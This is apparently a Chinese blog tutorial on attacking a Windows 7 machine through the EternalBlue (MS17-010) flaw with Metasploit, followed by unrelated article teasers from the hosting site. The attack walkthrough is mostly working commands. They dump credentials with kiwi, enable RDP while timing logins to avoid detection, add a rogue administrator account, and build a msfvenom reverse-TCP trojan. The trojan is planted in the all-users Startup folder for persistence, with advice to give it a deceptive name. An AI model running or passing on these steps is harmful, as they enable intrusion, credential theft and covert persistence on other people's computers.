kali——勒索病毒metasploit

我先来叙述一下大致流程:

1、使用mfs对 445端口进行攻击获得一系列权限

2、更新mfs版本

3、使用search 17_010对命令进行查看

4、use auxiliary/scanner/smb/smb_ms17_010使用该模块设置靶机set rhosts 靶机ip和设置本机监听端口 set lhost 0-65535

5、options查看配置

6、run运行攻击

本机和靶机在同一网段,可以ping通,靶机关闭防火墙的情况或者开启445端口的情况下进攻

相关基础命令

msfconsole -v  查看版本
msfdb init     初始化数据库
msfconsole    启动msf
use auxiliary/scanner/smb/smb_ms17_010   #在使用该模块的情况下
set rhosts 靶机ip   #设置目标靶机
set threads 50    #设置线程

db_status 
workspace
workspace -h

use auxiliary/scanner/portscan/

 端口扫描

nmap -sP 和 nmap -sn -PE 的区别 :

nmap -sP 和 nmap -sn -PE 都是 nmap 工具中用于网络扫描的参数组合,但它们的行为和目的有所不同。

  1. nmap -sP

nmap -sP 命令执行一个 ping 扫描。它会向目标网络中的每个 IP 地址发送 ICMP echo 请求包,以查看哪些主机是活跃的(即在线)。这个命令不会进行端口扫描,只关注于发现哪些 IP 地址对应的主机是响应 ICMP 请求的。

这个命令是快速且相对无侵入的,因为它不尝试连接到任何端口或执行详细的服务检测。它主要用于快速发现网络中的活跃主机。

  1. nmap -sn -PE

nmap -sn 命令告诉 nmap 只进行主机发现,不进行端口扫描。-sn 参数本身是一个快速的方式来确定哪些主机是活跃的,但它默认使用 ICMP echo 请求和 TCP SYN 包来探测主机。

-PE 参数是 nmap 的一个主机发现技术,它使用 ICMP echo 请求和 TCP ACK 包来探测主机。与 ICMP echo 请求不同,TCP ACK 包通常不会被防火墙过滤,因此使用 -PE 参数可能有助于在更严格的环境中发现活跃主机。

将 -sn 和 -PE 结合使用,nmap -sn -PE 命令会执行一个仅主机发现的扫描,使用 ICMP echo 请求和 TCP ACK 包来探测网络中的活跃主机。

区别

  • nmap -sP 仅使用 ICMP echo 请求来探测主机。
  • nmap -sn -PE 使用 ICMP echo 请求和 TCP ACK 包来探测主机,这可能会提高在某些网络环境中的探测成功率。

 获取权限成功后可以执行哪些 相关命令:

search 17_010    #查看相关命令
meterpreter > shell
chcp 65001  //转换一下编码 要不然会乱码
ipconfig  #查看ip
whoami    #查看当前用户名称

 

screenshot

下载文件的时候不知道为什么报错

下载文件命令

download 靶机文件路径

解决方案:

 

打开摄像头:

webcam_stream

 

因为是虚拟机,可能是驱动或者硬件原因

 密码查看:

meterpreter > load kiwi //加载kiwi模块
Loading extension kiwi...Success.
creds_all  #列举所有凭据
exit   #退出

远程登录:

开启3389端口

meterpreter > run post/windows/manage/enable_rdp  //启用目标主机的3389端口远程桌面
meterpreter > idletime  //查看远程用户的空闲时长,空闲时间长再进行远程登陆,减小被发现的风险。
root@kali:~# rdesktop 靶机ip //使用 rdesktop 命令远程连接桌面

我尝试发现,当我远程登录的时候,靶机会退出,靶机再次登录,我这边就会退出 

meterpreter > shell            #进入命令行
net user kill 123 /add         #新建用户kill 密码123
net  localgroup  administrators kill /add #将用户kill添加到Win7的本地管理员组中,获得管理员权限
net user               #查看用户

shutdown /s /t 0   #命令行关闭win7

//shutdown /s /t 0
//
//Access is denied.(5)
//没有足够的权限

远程木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.100.219(攻击机ip) lport=6666(攻击机监听端口) -f exe(生成的文件类型) -o demo6666(生成的文件名) 

这是一个木马程序,我想可不可以设置成开机自启文件?

C:\ProgramData\Microsoft\Windows\Start Menu\Programs>cd /ProgramData/Microsoft/Windows/Start Menu/Programs/Startup  

我先来讲一下我的大致思路哈:

demo6666是我生成的木马文件,在永恒之蓝的漏洞下我可以控制该win7,木马文件是等着别人点击的,就是相当于钓鱼,但是时间太长了,我想让他开机自启,也就是说只要用户下一次开机不管他点不点击都会中木马,然后C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\用来存放开机自启文件,我尝试将木马文件demo6666放到开机自启文件里。

上面的链接是针对所有用户,针对于本用户的可自行百度搜索。

报错:

排查:

先把文件上传到C://看看能不能转移到目录下

upload 本机文件 目标路径

授予权限:

net user    #查看用户
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /grant zhang:F   #zhang是用户名

 复制成功:

copy "demo6666" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"

验证木马放入成功否? 

算成功,也不算,win7开机弹出来——考虑将demo6666换成一个具有欺骗性的文件名

直接点击还出现这个问题:——虚拟机和win7显卡驱动不兼容导致的

我声明一下,该文章仅用于研究漏洞,不允许用于违法犯罪,仅用于传播知识,学习谨慎,违法不负责,如有不当,直接私信,联系必删。

不过win10 和11这个永恒之蓝的漏洞都被补上了。 

我大部分参考的这个文档:http://t.csdnimg.cn/BoYgQ

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/567344.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

中医药性笔记

目录 当归黄芪党参白术甘草茯苓半夏陈皮升麻柴胡 当归 补血。 当归,腾讯医典 黄芪 土金之药。 补中气的同时补肺气。益卫固表、利水消肿、 腾讯医典黄芪 党参 土金之药。健脾益肺,生津养血。 党参补气之力弱于人参、用于脾肺气虚的轻症。 党…

全量与增量的配置模式

在系统管理和数据处理领域,全量与增量配置是两种常见的方法,用于实现数据同步、更新部署或资源管理等任务。它们分别适用于不同的场景,依据任务的特性和需求选择合适的配置模式,有助于优化资源利用、提高效率并确保数据或系统的准…

node-sass安装失败解决

老项目安装node-sass4.14.1一直失败 "node-sass": "^4.14.1",报错环境变量Path 中没有 python2.7 gyp verb check python checking for Python executable "python2.7" in the PATH安装python2.7,然后设置npm config set python C:\Python27 …

计算机缺少msvcp120.dll如何解决,7种详细的修复方法分享

msvcr120.dll文件是微软Visual C运行时库的一部分,版本号为12.0。这个DLL文件包含了许多用于支持在Windows上运行的应用程序的重要函数和组件。它是确保某些程序能够正确执行的关键组成部分,特别是那些使用C编写或依赖于某些Microsoft库的程序。 当用户…

【智能算法】回溯搜索算法(BSA)原理及实现

目录 1.背景2.算法原理2.1算法思想2.2算法过程 3.结果展示4.参考文献 1.背景 2013年,P Civicioglu等人受到当前种群与历史种群之间的差分向量的引导启发,提出了回溯搜索算法(Backtracking Search Algorithm, BSA)。 2.算法原理…

MySQL及SQL语句

SQL语句 数据库相关概念数据查询语言(DQL)基本查询数据类型条件查询多表查询子查询 数据操作语言(DML)数据定义语言(DDL)数据控制语言(DCL)MySQL数据库约束视图练习题 数据库相关概念…

【总结】CycleGAN+YOLOv8+DeepSORT

本文章仅对本人前期工作进行总结,文章内容供读者参考,代码不对外公开 文章目录 1、CycleGAN1.1 数据集配置1.2 环境配置1.3 参数配置1.4 可视化训练过程1.5 训练结果1.5 结果测试 2、YOLOv82.1 数据集配置2.2 网络结构配置2.3 训练细节2.4 测试 3、Deep…

应用部署tomcat的三种方式

由于一直在用springboot框架,集成了tomcat,快忘记如何单独部署tomcat了,以下,记录一下: 部署tomcat有三种方式: 一、方式一:将war包丢进webapps 这是最简单粗暴的方式:将web工程打…

C++“流”风格日志系统实战-课程简介

一个能快速提升C复杂代码设计的学习项目,一个能迅速让C面试官会心一笑的简历项目,一个能在实际项目中使用的项目……学习什么是流?如何利用抽象层面的流编写适用面更广的代码? 每天在用的cout和cin 它们是什么类型?最后…

RadarScenes数据集详细说明

0 引言 RadarScenes数据集包含安装在一辆测量车辆上的四个汽车雷达传感器的数据。该数据集记录于2016年至2018年在德国乌尔姆。该数据集官方网址为RadarScenes - RadarScenes,详细的信息可以从该网址获取。 机器学习领域的一些出版物使用了该数据集。雷达场景论文…

【C++】类和对象④(类的默认成员函数:取地址及const取地址重载 | 再谈构造函数:初始化列表,隐式类型转换,缺省值)

🔥个人主页:Forcible Bug Maker 🔥专栏:C 目录 前言 取地址及const取地址操作符重载 再谈构造函数 初始化列表 隐式类型转换 explicit关键字 成员变量缺省值 结语 前言 本篇主要内容:类的六个默认成员函数中…

RK3568 学习笔记 : u-boot 千兆网络功能验证

前言 开发板型号: 【正点原子】 的 RK3568 开发板 使用 虚拟机 ubuntu 20.04 编译 RK3568 Linux SDK,生成镜像,烧写后,Linux 系统正常启动 开启后可以使用 CTRLC 进入 u-boot 本篇验证一下 u-boot 下网络功能 【正点原子】 rk…

TMS运输管理系统:开启高效物流之门的钥匙

TMS运输管理系统是一种集货运计划、路径规划、运输执行和跟踪管理于一体的综合管理系统。它利用现代信息技术和互联网资源,帮助企业高效管理供应链,提高物流效率和降低物流成本。本文将从系统优势、功能模块和应用案例等多个方面详细介绍TMS运输管理系统…

PHP校验15位和18位身份证号

第十八位数字的计算方法为: 1.将前面的身份证号码17位数分别乘以不同的系数。从第一位到第十七位的系数分 别为:7 9 10 5 8 4 2 1 6 3 7 9 10 5 8 4 2 2.将这17位数字和系数相乘的结果相加。 3.用加出来和除以11,看余数是多少? 4…

ESP32-Thonny 拍摄图片到SD卡

前言: 代码运行在Thonny 添加main.py到单片机中: 可以先运行一下试试:会输出以下信息: 没有问题的话(SD卡挂载成功,摄像头初始化成功)运行一次主程序后,闪光灯会闪烁一下。 代码&…

React首次加载渲染2次的问题

在开发React项目的时候,发现useEffect会调用2次的情况,依赖数组明明没有变化,怎么会调用2次?百思不得其解,依赖没变化的话,那肯定是整个组件重渲染了。 最最简单的代码如下: const container …

Python | Leetcode Python题解之第41题缺失的第一个正数

题目&#xff1a; 题解&#xff1a; class Solution:def firstMissingPositive(self, nums: List[int]) -> int:n len(nums)for i in range(n):while 1 < nums[i] < n and nums[nums[i] - 1] ! nums[i]:nums[nums[i] - 1], nums[i] nums[i], nums[nums[i] - 1]for …

vue实现水平排列且水平居中

样式实现 .body{text-align: center; } .body_content{display: inline-block; } .body_content_cardList{display: flex;flex-wrap: wrap;text-align: center; }<div class"body"><div class"body_content"><div class"body_content…

Mybatisplus LambdaQueryWrapper表达式使用DATE_FORMAT比较日期函数

背景&#xff1a; 最近遇到一个问题&#xff0c;数据库保存的日期字段是如下格式 但是我们需要比较的日期为 2020-08-01格式&#xff0c; 所以我们要将日期格式化 使用 Mybatisplus LambdaQueryWrapper的情况下可用下面的方式做参考 LambdaQueryWrapper<SysDicCode> la…